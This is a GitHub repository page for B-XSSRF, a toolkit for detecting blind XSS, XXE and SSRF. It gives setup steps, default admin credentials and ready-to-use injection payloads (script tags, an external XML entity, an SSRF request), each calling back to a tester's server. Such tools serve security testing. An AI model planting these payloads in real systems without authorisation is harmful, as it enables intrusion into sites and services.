Skip to content

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

Notifications You must be signed in to change notification settings

SpiderMate/B-XSSRF

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation


B-XSSRF
B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

B-XSSRF

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : admin@test.com
PASS : 123456

About

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published